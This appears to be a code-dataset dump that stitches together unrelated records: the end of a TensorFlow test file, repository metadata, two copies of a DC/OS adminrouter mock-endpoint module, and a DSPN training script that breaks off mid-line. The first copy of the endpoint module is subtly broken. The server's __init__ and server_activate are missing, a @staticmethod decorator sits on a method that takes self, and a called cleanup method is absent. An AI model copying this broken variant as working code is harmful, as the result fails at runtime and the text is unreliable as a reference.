tf.constant([0]), tf.constant([0]), tf.constant([0]), ), tf.constant([0]), ) example_handler(tensor, self.w) # good inputs shape but bad dtypes with self.assertRaises(ValueError): tensor = (tf.constant(["0"]), tf.constant([0])) example_handler(tensor, self.w) def test_none(self): """Test if None value fill the input of example_handler.""" w = WindowGenerator( input_width=50, label_width=20, shift=20, test_size=10, valid_size=10, flat=True, batch_size=32, ) w = w.from_array(data=self.data, input_columns=["test"], label_columns=["test"]) tensor = (tf.constant([0.0]), tf.constant([0.0])) np.testing.assert_equal( example_handler(tensor, w), ((tf.constant([0.0]), None, None, None), tf.constant([0.0])), ) @pytest.mark.usefixtures("prepare_data") class FillNoneTest(test.TestCase): def test_max_value(self): tensor = (tf.constant([0.0]), tf.constant([0.0])) np.testing.assert_equal( fill_none(tensor, max_value=4), (tf.constant([0.0]), tf.constant([0.0]), None, None), ) np.testing.assert_equal( fill_none(tensor, max_value=5), (tf.constant([0.0]), tf.constant([0.0]), None, None, None), )
2,109
5,488
222
462a6cefdccfc40c9c840424ec8ddc04070744bd
12,923
py
Python
packages/adminrouter/extra/src/test-harness/modules/mocker/endpoints/generic.py
makkes/dcos
a6df70f3f58ead134c8c49af8fa1387b4f81c19c
[ "Apache-2.0" ]
1
2019-04-26T17:46:37.000Z
2019-04-26T17:46:37.000Z
packages/adminrouter/extra/src/test-harness/modules/mocker/endpoints/generic.py
makkes/dcos
a6df70f3f58ead134c8c49af8fa1387b4f81c19c
[ "Apache-2.0" ]
720
2017-02-08T04:04:19.000Z
2021-09-14T14:04:56.000Z
packages/adminrouter/extra/src/test-harness/modules/mocker/endpoints/generic.py
makkes/dcos
a6df70f3f58ead134c8c49af8fa1387b4f81c19c
[ "Apache-2.0" ]
14
2017-02-08T03:57:24.000Z
2019-10-28T12:14:49.000Z
# Copyright (C) Mesosphere, Inc. See LICENSE file for details. """ Shared code for DC/OS endpoints mocks used by AR instances, both EE and Open. """ import abc import http.server import logging import os import socket import socketserver import ssl import threading # pylint: disable=C0103 log = logging.getLogger(__name__) # Just a dict would be no good as we want to have threading lock initialization # as well. # pylint: disable=R0903 class EndpointContext: """An endpoint context that holds all the endpoint data together with threading lock that protects it.""" data = None lock = None def __init__(self, initial_data=None): """Initialize EndpointContext object. This data is often manipulated by methods nested across inheritance chains, so we need to use RLock() instead of Lock(). The need for the lock itself stems from the fact that very often certain keys of the context need to be manipulated at the same time/in synchronized manner. In some of the places, code relies on thread safety/atomicity of some of Python's expressions/statements: https://docs.python.org/3.6/faq/library.html#what-kinds-of-global-value-mutation-are-thread-safe This is why some of the operations on the EndpointContext dictionary are not protected by locks, esp. in case when it's only about fetching a single value from context dict or storing/appending one there. Args: initial_data (dict): initial data to initialize context with """ self.lock = threading.RLock() if initial_data is not None: self.data = initial_data else: self.data = {} class Endpoint(abc.ABC): """Endpoint base class, from which all Endpoints must inherit This class represents common behaviour shared across all endpoints, no matter the function or repository flavour (ee/open). Ever endpoint must by default serve GOOD/expected data, and only after changing it's state using it's methods, it may start serving something else and/or simulate error conditions. The state of the endpoint may be changed by tests/fixtures by executing Mocker's .send_command() method which in turn redirect the call to the correct endpoint call. For the sake of simplicity it is assumed that each such method will have well-defined interface: def do_something(self, aux_data=None): return result `aux_data` is a python dictionary that must provide all data required by function to execute. It can be None if such data is not required `result` can be anything that makes sense in particular function's case. """ _context = None _httpd_thread = None _httpd = None def __init__(self, endpoint_id): """Initialize new Endpoint object Args: endpoint_id (str): ID of the endpoint that it should identify itself with """ initial_data = {"always_bork": False, "endpoint_id": endpoint_id, "always_redirect": False, "redirect_target": None, "always_stall": False, "response_headers": {}, "stall_time": 0, } self._context = EndpointContext(initial_data) @property def id(self): """Return ID of the endpoint""" return self._context.data['endpoint_id'] def start(self): """Start endpoint's threaded httpd server""" log.debug("Starting endpoint `%s`", self.id) self._httpd_thread.start() self._httpd.startup_done.wait() def stop(self): """Perform cleanup of the endpoint threads This method should be used right before destroying the Endpoint object. It takes care of stopping internal httpd server. """ log.debug("Stopping endpoint `%s`", self.id) self._httpd.shutdown() self._httpd_thread.join() self._httpd.server_close() def reset(self, aux_data=None): """Reset endpoint to the default/good state Args: aux_data (dict): unused, present only to satisfy the endpoint's method interface. See class description for details. """ del aux_data log.debug("Resetting endpoint `%s`", self.id) # Locking is not really needed here as it is atomic op anyway, # but let's be consistent with self._context.lock: self._context.data['always_bork'] = False self._context.data['always_stall'] = False self._context.data['stall_time'] = 0 self._context.data["always_redirect"] = False self._context.data["redirect_target"] = None def set_response_headers(self, aux_data): """Make endpoint sent custom headers in the response Args: aux_data: a dict with header's name/content as keys/vals """ with self._context.lock: self._context.data["response_headers"].update(aux_data) def always_stall(self, aux_data=None): """Make endpoint always wait given time before answering the request Args: aux_data (numeric): time in seconds, as acepted by time.sleep() function """ with self._context.lock: self._context.data["always_stall"] = True self._context.data["stall_time"] = aux_data def always_bork(self, aux_data=True): """Make endpoint always respond with an error Args: aux_data (dict): True or False, depending whether endpoint should always respond with errors or not. """ self._context.data["always_bork"] = aux_data def always_redirect(self, aux_data=None): """Make endpoint always respond with a redirect Args: aux_data (str): target location for the redirect """ with self._context.lock: self._context.data["always_redirect"] = True self._context.data["redirect_target"] = aux_data class StatefullHTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer): """Base class for all endpoint-internal httpd servers. This class serves as a base for all internal httpd server, it's role is to pull in Threading mix-in and link Endpoint context to httpd itself, so that it's available in the httpd request handler through request's .server.context attribute. Worth noting that this is by default a TCP/IP server. It's based on: https://mail.python.org/pipermail/python-list/2012-March/621727.html """ class TcpIpHttpEndpoint(Endpoint): """Base class for all endpoints that serve TCP/IP requests This class binds together HTTPd server code, http request handler and endpoint context to form a base class for all endpoints that serve TCP/IP traffic. """ def __init__(self, handler_class, port, ip='', keyfile=None, certfile=None): """Initialize new TcpIpHttpEndpoint object Args: handler_class (obj): a request handler class that will be handling requests received by internal httpd server port (int): tcp port that httpd server will listen on ip (str): ip address that httpd server will listen on, by default listen on all addresses """ if certfile is not None and keyfile is not None: endpoint_id = "https://{}:{}".format(ip, port) else: endpoint_id = "http://{}:{}".format(ip, port) super().__init__(endpoint_id) self._context.data['listen_ip'] = ip self._context.data['listen_port'] = port self._context.data['certfile'] = certfile self._context.data['keyfile'] = keyfile self._handler_class = handler_class self.__setup_httpd_thread(ip, port) def __setup_httpd_thread(self, ip, port): """Setup internal HTTPd server that this endpoints relies on to serve requests. """ self._httpd = StatefullHTTPServer(self._context, (ip, port), self._handler_class) httpd_thread_name = "TcpIpHttpdThread-{}".format(self.id) self._httpd_thread = threading.Thread(target=self._httpd.serve_forever, name=httpd_thread_name) class UnixSocketStatefulHTTPServer(StatefullHTTPServer): """Base class for all endpoint-internal httpd servers that listen on Unix socket. This class inherits from StatefullHTTPServer and mofies it's behaviour so that it's able to listen on Unix socket. Attributes: address_family: set only to override default value of the variable set in the http.server.HTTPServer class, must not be modified. """ address_family = socket.AF_UNIX def server_bind(self): """Override default server socket bind behaviour to adapt it to serving on Unix socket. Please check the documentation of http.server.HTTPServer class for more details. """ socketserver.TCPServer.server_bind(self) self.server_name = self.context.data['socket_path'] self.server_port = 0 def client_address(self): """Override default client_address method to adapt it to serving on Unix socket. Without it logging will break as Unix socket has no notion of the client's IP address. Please check the documentation of http.server.HTTPServer class for more details. """ return (self.context.data['socket_path'], 0) # http://stackoverflow.com/questions/21650370/setting-up-an-http-server-that-listens-over-a-file-socket # https://docs.python.org/3.3/library/socketserver.html class UnixSocketHTTPEndpoint(Endpoint): """Base class for all endpoints that serve requests on the Unix socket This class binds together HTTPd server code, http request handler and endpoint context to form a base class for all endpoints that serve Unix socket traffic. """ def __init__(self, handler_class, path, keyfile=None, certfile=None): """Initialize new UnixSocketHTTPEndpoint object Args: handler_class (obj): a request handler class that will be handling requests received by internal httpd server path (str): Unix socket path, that internal httpd server will listen on """ if certfile is not None and keyfile is not None: endpoint_id = "https://{}".format(path) else: endpoint_id = "http://{}".format(path) super().__init__(endpoint_id) self._context.data['socket_path'] = path self._context.data['certfile'] = certfile self._context.data['keyfile'] = keyfile self._handler_class = handler_class self.__cleanup_stale_socket(path) self.__setup_httpd_thread(path) @staticmethod def __setup_httpd_thread(self, socket_path): """Setup internal HTTPd server that this endpoints relies on to serve requests. Args: path (str): Unix socket path, that internal httpd server will listen on """ self._httpd = UnixSocketStatefulHTTPServer(self._context, socket_path, self._handler_class) httpd_thread_name = "UnixSocketHttpdThread-{}".format(self.id) self._httpd_thread = threading.Thread(target=self._httpd.serve_forever, name=httpd_thread_name) # nginx spawns worker processes as 'nobody/nogroup', so we need to # make the socket available to it. os.chmod(socket_path, 0o777)
36.922857
108
0.630349
# Copyright (C) Mesosphere, Inc. See LICENSE file for details. """ Shared code for DC/OS endpoints mocks used by AR instances, both EE and Open. """ import abc import http.server import logging import os import socket import socketserver import ssl import threading # pylint: disable=C0103 log = logging.getLogger(__name__) # Just a dict would be no good as we want to have threading lock initialization # as well. # pylint: disable=R0903 class EndpointContext: """An endpoint context that holds all the endpoint data together with threading lock that protects it.""" data = None lock = None def __init__(self, initial_data=None): """Initialize EndpointContext object. This data is often manipulated by methods nested across inheritance chains, so we need to use RLock() instead of Lock(). The need for the lock itself stems from the fact that very often certain keys of the context need to be manipulated at the same time/in synchronized manner. In some of the places, code relies on thread safety/atomicity of some of Python's expressions/statements: https://docs.python.org/3.6/faq/library.html#what-kinds-of-global-value-mutation-are-thread-safe This is why some of the operations on the EndpointContext dictionary are not protected by locks, esp. in case when it's only about fetching a single value from context dict or storing/appending one there. Args: initial_data (dict): initial data to initialize context with """ self.lock = threading.RLock() if initial_data is not None: self.data = initial_data else: self.data = {} class Endpoint(abc.ABC): """Endpoint base class, from which all Endpoints must inherit This class represents common behaviour shared across all endpoints, no matter the function or repository flavour (ee/open). Ever endpoint must by default serve GOOD/expected data, and only after changing it's state using it's methods, it may start serving something else and/or simulate error conditions. The state of the endpoint may be changed by tests/fixtures by executing Mocker's .send_command() method which in turn redirect the call to the correct endpoint call. For the sake of simplicity it is assumed that each such method will have well-defined interface: def do_something(self, aux_data=None): return result `aux_data` is a python dictionary that must provide all data required by function to execute. It can be None if such data is not required `result` can be anything that makes sense in particular function's case. """ _context = None _httpd_thread = None _httpd = None def __init__(self, endpoint_id): """Initialize new Endpoint object Args: endpoint_id (str): ID of the endpoint that it should identify itself with """ initial_data = {"always_bork": False, "endpoint_id": endpoint_id, "always_redirect": False, "redirect_target": None, "always_stall": False, "response_headers": {}, "stall_time": 0, } self._context = EndpointContext(initial_data) @property def id(self): """Return ID of the endpoint""" return self._context.data['endpoint_id'] def start(self): """Start endpoint's threaded httpd server""" log.debug("Starting endpoint `%s`", self.id) self._httpd_thread.start() self._httpd.startup_done.wait() def stop(self): """Perform cleanup of the endpoint threads This method should be used right before destroying the Endpoint object. It takes care of stopping internal httpd server. """ log.debug("Stopping endpoint `%s`", self.id) self._httpd.shutdown() self._httpd_thread.join() self._httpd.server_close() def reset(self, aux_data=None): """Reset endpoint to the default/good state Args: aux_data (dict): unused, present only to satisfy the endpoint's method interface. See class description for details. """ del aux_data log.debug("Resetting endpoint `%s`", self.id) # Locking is not really needed here as it is atomic op anyway, # but let's be consistent with self._context.lock: self._context.data['always_bork'] = False self._context.data['always_stall'] = False self._context.data['stall_time'] = 0 self._context.data["always_redirect"] = False self._context.data["redirect_target"] = None def set_response_headers(self, aux_data): """Make endpoint sent custom headers in the response Args: aux_data: a dict with header's name/content as keys/vals """ with self._context.lock: self._context.data["response_headers"].update(aux_data) def always_stall(self, aux_data=None): """Make endpoint always wait given time before answering the request Args: aux_data (numeric): time in seconds, as acepted by time.sleep() function """ with self._context.lock: self._context.data["always_stall"] = True self._context.data["stall_time"] = aux_data def always_bork(self, aux_data=True): """Make endpoint always respond with an error Args: aux_data (dict): True or False, depending whether endpoint should always respond with errors or not. """ self._context.data["always_bork"] = aux_data def always_redirect(self, aux_data=None): """Make endpoint always respond with a redirect Args: aux_data (str): target location for the redirect """ with self._context.lock: self._context.data["always_redirect"] = True self._context.data["redirect_target"] = aux_data class StatefullHTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer): """Base class for all endpoint-internal httpd servers. This class serves as a base for all internal httpd server, it's role is to pull in Threading mix-in and link Endpoint context to httpd itself, so that it's available in the httpd request handler through request's .server.context attribute. Worth noting that this is by default a TCP/IP server. It's based on: https://mail.python.org/pipermail/python-list/2012-March/621727.html """ def __init__(self, context, *args, **kw): self.context = context self.startup_done = threading.Event() http.server.HTTPServer.__init__(self, *args, **kw) certfile = self.context.data['certfile'] keyfile = self.context.data['keyfile'] if certfile is not None and keyfile is not None: self.socket = ssl.wrap_socket(self.socket, keyfile=keyfile, certfile=certfile, server_side=True) def server_activate(self): super().server_activate() self.startup_done.set() class TcpIpHttpEndpoint(Endpoint): """Base class for all endpoints that serve TCP/IP requests This class binds together HTTPd server code, http request handler and endpoint context to form a base class for all endpoints that serve TCP/IP traffic. """ def __init__(self, handler_class, port, ip='', keyfile=None, certfile=None): """Initialize new TcpIpHttpEndpoint object Args: handler_class (obj): a request handler class that will be handling requests received by internal httpd server port (int): tcp port that httpd server will listen on ip (str): ip address that httpd server will listen on, by default listen on all addresses """ if certfile is not None and keyfile is not None: endpoint_id = "https://{}:{}".format(ip, port) else: endpoint_id = "http://{}:{}".format(ip, port) super().__init__(endpoint_id) self._context.data['listen_ip'] = ip self._context.data['listen_port'] = port self._context.data['certfile'] = certfile self._context.data['keyfile'] = keyfile self._handler_class = handler_class self.__setup_httpd_thread(ip, port) def __setup_httpd_thread(self, ip, port): """Setup internal HTTPd server that this endpoints relies on to serve requests. """ self._httpd = StatefullHTTPServer(self._context, (ip, port), self._handler_class) httpd_thread_name = "TcpIpHttpdThread-{}".format(self.id) self._httpd_thread = threading.Thread(target=self._httpd.serve_forever, name=httpd_thread_name) class UnixSocketStatefulHTTPServer(StatefullHTTPServer): """Base class for all endpoint-internal httpd servers that listen on Unix socket. This class inherits from StatefullHTTPServer and mofies it's behaviour so that it's able to listen on Unix socket. Attributes: address_family: set only to override default value of the variable set in the http.server.HTTPServer class, must not be modified. """ address_family = socket.AF_UNIX def server_bind(self): """Override default server socket bind behaviour to adapt it to serving on Unix socket. Please check the documentation of http.server.HTTPServer class for more details. """ socketserver.TCPServer.server_bind(self) self.server_name = self.context.data['socket_path'] self.server_port = 0 def client_address(self): """Override default client_address method to adapt it to serving on Unix socket. Without it logging will break as Unix socket has no notion of the client's IP address. Please check the documentation of http.server.HTTPServer class for more details. """ return (self.context.data['socket_path'], 0) # http://stackoverflow.com/questions/21650370/setting-up-an-http-server-that-listens-over-a-file-socket # https://docs.python.org/3.3/library/socketserver.html class UnixSocketHTTPEndpoint(Endpoint): """Base class for all endpoints that serve requests on the Unix socket This class binds together HTTPd server code, http request handler and endpoint context to form a base class for all endpoints that serve Unix socket traffic. """ def __init__(self, handler_class, path, keyfile=None, certfile=None): """Initialize new UnixSocketHTTPEndpoint object Args: handler_class (obj): a request handler class that will be handling requests received by internal httpd server path (str): Unix socket path, that internal httpd server will listen on """ if certfile is not None and keyfile is not None: endpoint_id = "https://{}".format(path) else: endpoint_id = "http://{}".format(path) super().__init__(endpoint_id) self._context.data['socket_path'] = path self._context.data['certfile'] = certfile self._context.data['keyfile'] = keyfile self._handler_class = handler_class self.__cleanup_stale_socket(path) self.__setup_httpd_thread(path) @staticmethod def __cleanup_stale_socket(socket_path): if os.path.exists(socket_path): os.remove(socket_path) def __setup_httpd_thread(self, socket_path): """Setup internal HTTPd server that this endpoints relies on to serve requests. Args: path (str): Unix socket path, that internal httpd server will listen on """ self._httpd = UnixSocketStatefulHTTPServer(self._context, socket_path, self._handler_class) httpd_thread_name = "UnixSocketHttpdThread-{}".format(self.id) self._httpd_thread = threading.Thread(target=self._httpd.serve_forever, name=httpd_thread_name) # nginx spawns worker processes as 'nobody/nogroup', so we need to # make the socket available to it. os.chmod(socket_path, 0o777)
710
0
79
9ec35e51357b9666792505fb9f52a9e1ad10e223
24,247
py
Python
dspn/train.py
FlorianSchroevers/dspn
8bd2fe9b336099da8c18c9ce716c00e7cf1ca0b6
[ "MIT" ]
null
null
null
dspn/train.py
FlorianSchroevers/dspn
8bd2fe9b336099da8c18c9ce716c00e7cf1ca0b6
[ "MIT" ]
null
null
null
dspn/train.py
FlorianSchroevers/dspn
8bd2fe9b336099da8c18c9ce716c00e7cf1ca0b6
[ "MIT" ]
null
null
null
import os import argparse from datetime import datetime import time import torch import torch.nn.functional as F import torch.multiprocessing as mp import numpy as np import pandas as pd from tqdm import tqdm import matplotlib import matplotlib.pyplot as plt from tensorboardX import SummaryWriter import data import track import model import utils matplotlib.use("Qt5Agg") if __name__ == "__main__": try: main() except KeyboardInterrupt: print("Process interrupted by user, emptying cache...") torch.cuda.empty_cache()
33.352132
79
0.479894
import os import argparse from datetime import datetime import time import torch import torch.nn.functional as F import torch.multiprocessing as mp import numpy as np import pandas as pd from tqdm import tqdm import matplotlib import matplotlib.pyplot as plt from tensorboardX import SummaryWriter import data import track import model import utils matplotlib.use("Qt5Agg") def main(): global net global test_loader global scatter parser = argparse.ArgumentParser() # generic params parser.add_argument( "--name", default=datetime.now().strftime("%Y-%m-%d_%H:%M:%S"), help="Name to store the log file as", ) parser.add_argument("--resume", help="Path to log file to resume from") parser.add_argument("--encoder", default="FSEncoder", help="Encoder") parser.add_argument("--decoder", default="DSPN", help="Decoder") parser.add_argument( "--epochs", type=int, default=10, help="Number of epochs to train with" ) parser.add_argument( "--latent", type=int, default=32, help="Dimensionality of latent space" ) parser.add_argument( "--dim", type=int, default=64, help="Dimensionality of hidden layers" ) parser.add_argument( "--lr", type=float, default=1e-2, help="Outer learning rate of model" ) parser.add_argument( "--batch-size", type=int, default=12, help="Batch size to train with" ) parser.add_argument( "--num-workers", type=int, default=0, help="Number of threads for data loader" ) parser.add_argument( "--dataset", choices=[ "mnist", "clevr-box", "clevr-state", "cats", "merged", "wflw" ], help="Which dataset to use", ) parser.add_argument( "--no-cuda", action="store_true", help="Run on CPU instead of GPU (not recommended)", ) parser.add_argument( "--train-only", action="store_true", help="Only run training, no evaluation" ) parser.add_argument( "--eval-only", action="store_true", help="Only run evaluation, no training" ) parser.add_argument( "--multi-gpu", action="store_true", help="Use multiple GPUs" ) parser.add_argument( "--show", action="store_true", help="Plot generated samples in Tensorboard" ) parser.add_argument( "--show-skip", type=int, default=1, help="Number of epochs to skip before exporting to Tensorboard" ) parser.add_argument( "--infer-name", action="store_true", help="Automatically name run based on dataset/run number" ) parser.add_argument("--supervised", action="store_true", help="") parser.add_argument( "--baseline", action="store_true", help="Use baseline model" ) parser.add_argument( "--export-dir", type=str, help="Directory to output samples to") parser.add_argument( "--export-n", type=int, default=10 ** 9, help="How many samples to output" ) parser.add_argument( "--export-progress", action="store_true", help="Output intermediate set predictions for DSPN?", ) parser.add_argument( "--full-eval", action="store_true", help="Use full evaluation set (default: 1/10 of evaluation data)", # don't need full evaluation when training to save some time ) parser.add_argument( "--mask-feature", action="store_true", help="Treat mask as a feature to compute loss with", ) parser.add_argument( "--inner-lr", type=float, default=800, help="Learning rate of DSPN inner optimisation", ) parser.add_argument( "--iters", type=int, default=10, help="How many DSPN inner optimisation iteration to take", ) parser.add_argument( "--huber-repr", type=float, default=1, help="Scaling of repr loss term for DSPN supervised learning", ) parser.add_argument( "--loss", choices=["hungarian", "chamfer", "emd"], default="emd", help="Type of loss used", ) parser.add_argument( "--export-csv", action="store_true", help="Only perform predictions, don't evaluate in any way" ) parser.add_argument( "--eval-split", help="Overwrite split on test set" ) args = parser.parse_args() if args.infer_name: if args.baseline: prefix = "base" else: prefix = "dspn" used_nums = [] if not os.path.exists("runs"): os.makedirs("runs") runs = os.listdir("runs") for run in runs: if args.dataset in run: used_nums.append(int(run.split("-")[-1])) num = 1 while num in used_nums: num += 1 name = f"{prefix}-{args.dataset}-{num}" else: name = args.name print(f"Saving run to runs/{name}") train_writer = SummaryWriter(f"runs/{name}", purge_step=0) net = model.build_net(args) if not args.no_cuda: net = net.cuda() if args.multi_gpu: net = torch.nn.DataParallel(net) optimizer = torch.optim.Adam( [p for p in net.parameters() if p.requires_grad], lr=args.lr ) print("Building dataloader") if args.dataset == "mnist": dataset_train = data.MNISTSet(train=True, full=args.full_eval) dataset_test = data.MNISTSet(train=False, full=args.full_eval) elif args.dataset in ["clevr-box", "clevr-state"]: dataset_train = data.CLEVR( "clevr", "train", box=args.dataset == "clevr-box", full=args.full_eval ) dataset_test = data.CLEVR( "clevr", "val", box=args.dataset == "clevr-box", full=args.full_eval ) elif args.dataset == "cats": dataset_train = data.Cats("cats", "train", 9, full=args.full_eval) dataset_test = data.Cats("cats", "val", 9, full=args.full_eval) elif args.dataset == "faces": dataset_train = data.Faces("faces", "train", 4, full=args.full_eval) dataset_test = data.Faces("faces", "val", 4, full=args.full_eval) elif args.dataset == "wflw": if args.eval_split: eval_split = f"test_{args.eval_split}" else: eval_split = "test" dataset_train = data.WFLW("wflw", "train", 7, full=args.full_eval) dataset_test = data.WFLW("wflw", eval_split, 7, full=args.full_eval) elif args.dataset == "merged": # merged cats and human faces dataset_train_cats = data.Cats("cats", "train", 9, full=args.full_eval) dataset_train_wflw = data.WFLW("wflw", "train", 9, full=args.full_eval) dataset_test_cats = data.Cats("cats", "val", 9, full=args.full_eval) dataset_test_wflw = data.WFLW("wflw", "test", 9, full=args.full_eval) dataset_train = data.MergedDataset( dataset_train_cats, dataset_train_wflw ) dataset_test = data.MergedDataset( dataset_test_cats, dataset_test_wflw ) if not args.eval_only: train_loader = data.get_loader( dataset_train, batch_size=args.batch_size, num_workers=args.num_workers ) if not args.train_only: test_loader = data.get_loader( dataset_test, batch_size=args.batch_size, num_workers=args.num_workers, shuffle=False ) tracker = track.Tracker( train_mae=track.ExpMean(), train_last=track.ExpMean(), train_loss=track.ExpMean(), test_mae=track.Mean(), test_last=track.Mean(), test_loss=track.Mean(), ) if args.resume: log = torch.load(args.resume) weights = log["weights"] n = net if args.multi_gpu: n = n.module n.load_state_dict(weights, strict=True) if args.export_csv: names = [] predictions = [] export_targets = [] def run(net, loader, optimizer, train=False, epoch=0, pool=None): writer = train_writer if train: net.train() prefix = "train" torch.set_grad_enabled(True) else: net.eval() prefix = "test" torch.set_grad_enabled(False) if args.export_dir: true_export = [] pred_export = [] iters_per_epoch = len(loader) loader = tqdm( loader, ncols=0, desc="{1} E{0:02d}".format(epoch, "train" if train else "test "), ) for i, sample in enumerate(loader, start=epoch * iters_per_epoch): # input is either a set or an image input, target_set, target_mask = map(lambda x: x.cuda(), sample) # forward evaluation through the network (progress, masks, evals, gradn), (y_enc, y_label) = net( input, target_set, target_mask ) progress_only = progress # if using mask as feature, concat mask feature into progress if args.mask_feature: target_set = torch.cat( [target_set, target_mask.unsqueeze(dim=1)], dim=1 ) progress = [ torch.cat([p, m.unsqueeze(dim=1)], dim=1) for p, m in zip(progress, masks) ] if args.loss == "chamfer": # dim 0 is over the inner iteration steps # target set is broadcasted over dim 0 set_loss = utils.chamfer_loss( torch.stack(progress), target_set.unsqueeze(0) ) elif args.loss == "hungarian": set_loss = utils.hungarian_loss( progress[-1], target_set, thread_pool=pool ).unsqueeze(0) elif args.loss == "emd": set_loss = utils.emd(progress[-1], target_set).unsqueeze(0) # Only use representation loss with DSPN and when doing general # supervised prediction, not when auto-encoding if args.supervised and not args.baseline: repr_loss = args.huber_repr * F.smooth_l1_loss(y_enc, y_label) loss = set_loss.mean() + repr_loss.mean() else: loss = set_loss.mean() # restore progress variable to not contain masks for correct # exporting progress = progress_only # Outer optim step if train: optimizer.zero_grad() loss.backward() optimizer.step() # Tensorboard tracking of metrics for debugging tracked_last = tracker.update( f"{prefix}_last", set_loss[-1].item() ) tracked_loss = tracker.update(f"{prefix}_loss", loss.item()) if train: writer.add_scalar( "metric/set-loss", loss.item(), global_step=i ) writer.add_scalar( "metric/set-last", set_loss[-1].mean().item(), global_step=i ) if not args.baseline: writer.add_scalar( "metric/eval-first", evals[0].mean().item(), global_step=i ) writer.add_scalar( "metric/eval-last", evals[-1].mean().item(), global_step=i ) writer.add_scalar( "metric/max-inner-grad-norm", max(g.item() for g in gradn), global_step=i ) writer.add_scalar( "metric/mean-inner-grad-norm", sum(g.item() for g in gradn)/len(gradn), global_step=i ) if args.supervised: writer.add_scalar( "metric/repr_loss", repr_loss.item(), global_step=i ) # Print current progress to progress bar fmt = "{:.6f}".format loader.set_postfix( last=fmt(tracked_last), loss=fmt(tracked_loss), bad=fmt(evals[-1].detach().cpu().item() * 1000) if not args.baseline else 0 ) if args.export_dir: # export last inner optim of each input as csv # (one input per row) if args.export_csv: # the second to last element are the last of the # inner optim for batch_i, p in enumerate(progress[-2]): img_id = i * args.batch_size + batch_i names.append(loader.iterable.dataset.get_fname(img_id)) m = masks[-2][batch_i] m = m.cpu().detach().numpy().astype(bool) p = p.cpu().detach().numpy() p = p[:, m] sample_preds = [ p[k % 2, k // 2] for k in range(p.shape[1] * 2) ] # remove values according to mask and add zeros to the # end in stead sample_preds += [0] * (len(m) * 2 - len(sample_preds)) predictions.append(sample_preds) true_mask = target_set[batch_i, 2, :].cpu().detach() true_mask = true_mask.numpy().astype(bool) trues = target_set[batch_i, :2, :] trues = trues.cpu().detach().numpy() t = trues[:, true_mask] t = [t[k % 2, k // 2] for k in range(t.shape[1] * 2)] t += [0] * (len(true_mask) * 2 - len(t)) export_targets.append(t) # Store predictions to be exported else: if len(true_export) < args.export_n: for p, m in zip(target_set, target_mask): true_export.append(p.detach().cpu()) progress_steps = [] for pro, ms in zip(progress, masks): # pro and ms are one step of the inner optim # score boxes contains the list of predicted # elements for one step score_boxes = [] for p, m in zip( pro.cpu().detach(), ms.cpu().detach()): score_box = torch.cat( [m.unsqueeze(0), p], dim=0 ) score_boxes.append(score_box) progress_steps.append(score_boxes) for b in zip(*progress_steps): pred_export.append(b) # Plot predictions in Tensorboard if args.show and epoch % args.show_skip == 0 and not train: name = f"set/epoch-{epoch}/img-{i}" # thresholded set progress.append(progress[-1]) masks.append((masks[-1] > 0.5).float()) # target set if args.mask_feature: # target set is augmented with masks, so remove them progress.append(target_set[:, :-1]) else: progress.append(target_set) masks.append(target_mask) # intermediate sets for j, (s, ms) in enumerate(zip(progress, masks)): if args.dataset == "clevr-state": continue if args.dataset.startswith("clevr"): threshold = 0.5 else: threshold = None s, ms = utils.scatter_masked( s, ms, binned=args.dataset.startswith("clevr"), threshold=threshold ) if j != len(progress) - 1: tag_name = f"{name}" else: tag_name = f"{name}-target" if args.dataset == "clevr-box": img = input[0].detach().cpu() writer.add_image_with_boxes( tag_name, img, s.transpose(0, 1), global_step=j ) elif args.dataset == "cats" \ or args.dataset == "wflw" \ or args.dataset == "merged": img = input[0].detach().cpu() fig = plt.figure() plt.scatter(s[0, :]*128, s[1, :]*128) plt.imshow(np.transpose(img, (1, 2, 0))) writer.add_figure(tag_name, fig, global_step=j) else: # mnist fig = plt.figure() y, x = s y = 1 - y ms = ms.numpy() rgba_colors = np.zeros((ms.size, 4)) rgba_colors[:, 2] = 1.0 rgba_colors[:, 3] = ms plt.scatter(x, y, color=rgba_colors) plt.axes().set_aspect("equal") plt.xlim(0, 1) plt.ylim(0, 1) writer.add_figure(tag_name, fig, global_step=j) # Export predictions if args.export_dir and not args.export_csv: os.makedirs(f"{args.export_dir}/groundtruths", exist_ok=True) os.makedirs(f"{args.export_dir}/detections", exist_ok=True) for i, (gt, dets) in enumerate(zip(true_export, pred_export)): export_groundtruths_path = os.path.join( args.export_dir, "groundtruths", f"{i}.txt" ) with open(export_groundtruths_path, "w") as fd: for box in gt.transpose(0, 1): if (box == 0).all(): continue s = "box " + " ".join(map(str, box.tolist())) fd.write(s + "\n") if args.export_progress: for step, det in enumerate(dets): export_progress_path = os.path.join( args.export_dir, "detections", f"{i}-step{step}.txt" ) with open(export_progress_path, "w") as fd: for sbox in det.transpose(0, 1): s = f"box " + " ".join(map(str, sbox.tolist())) fd.write(s + "\n") export_path = os.path.join( args.export_dir, "detections", f"{i}.txt" ) with open(export_path, "w") as fd: for sbox in dets[-1].transpose(0, 1): s = f"box " + " ".join(map(str, sbox.tolist())) fd.write(s + "\n") import subprocess git_hash = subprocess.check_output(["git", "rev-parse", "HEAD"]) # git_hash = "483igtrfiuey46" torch.backends.cudnn.benchmark = True metrics = {} start = time.time() if args.eval_only: tracker.new_epoch() with mp.Pool(10) as pool: run( net, test_loader, optimizer, train=False, epoch=0, pool=pool ) metrics["test_loss"] = np.mean(tracker.data["test_loss"][-1]) metrics["test_set_loss"] = np.mean(tracker.data["test_last"][-1]) else: best_test_loss = float("inf") for epoch in range(args.epochs): tracker.new_epoch() with mp.Pool(10) as pool: run( net, train_loader, optimizer, train=True, epoch=epoch, pool=pool ) if not args.train_only: run( net, test_loader, optimizer, train=False, epoch=epoch, pool=pool ) epoch_test_loss = np.mean(tracker.data["test_loss"][-1]) if epoch_test_loss < best_test_loss: print("new best loss") best_test_loss = epoch_test_loss # only save if the epoch has lower loss metrics["test_loss"] = epoch_test_loss metrics["train_loss"] = np.mean(tracker.data["train_loss"][-1]) metrics["train_set_loss"] = np.mean( tracker.data["train_last"][-1]) metrics["test_set_loss"] = np.mean( tracker.data["test_last"][-1]) metrics["best_epoch"] = epoch results = { "name": name + "-best", "tracker": tracker.data, "weights": net.state_dict() if not args.multi_gpu else net.module.state_dict(), "args": vars(args), "hash": git_hash, } torch.save(results, os.path.join("logs", name + "-best")) results = { "name": name + "-final", "tracker": tracker.data, "weights": net.state_dict() if not args.multi_gpu else net.module.state_dict(), "args": vars(args), "hash": git_hash, } torch.save(results, os.path.join("logs", name + "-final")) if args.export_csv and args.export_dir: path = 